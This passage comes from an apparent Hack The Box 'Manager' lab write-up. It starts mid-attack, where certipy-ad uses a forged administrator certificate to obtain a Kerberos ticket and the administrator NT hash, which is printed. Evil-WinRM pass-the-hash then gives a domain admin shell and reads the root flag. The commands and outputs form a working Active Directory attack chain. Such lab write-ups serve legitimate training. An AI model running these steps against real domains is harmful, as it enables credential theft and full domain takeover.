[*] Certificate has no object SID
[*] Loaded private key from '15.key'
[*] Saved certificate and private key to 'administrator.pfx'
Dump the admin hash
certipy-ad auth -pfx administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]':
aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
Read flag: root.txt
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Manager]
└─$ evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/26/2024 10:45 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
0539a64061555aa1dc9475d92879de51
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
===================== =============================================
manager\administrator S-1-5-21-4078382237-1492182817-2568127209-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================== ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MANAGER\Group Policy Creator Owners Group S-1-5-21-4078382237-1492182817-2568127209-520 Mandatory group, Enabled by default, Enabled group
MANAGER\Domain Admins Group S-1-5-21-4078382237-1492182817-2568127209-512 Mandatory group, Enabled by default, Enabled group
MANAGER\Enterprise Admins Group S-1-5-21-4078382237-1492182817-2568127209-519 Mandatory group, Enabled by default, Enabled group
MANAGER\Schema Admins Group S-1-5-21-4078382237-1492182817-2568127209-518 Mandatory group, Enabled by default, Enabled group
MANAGER\Denied RODC Password Replication Group Alias S-1-5-21-4078382237-1492182817-2568127209-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> iptables
The term 'iptables' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ iptables
+ ~~~~~~~~
+ CategoryInfo : ObjectNotFound: (iptables:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.236
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
References
Lessons Learned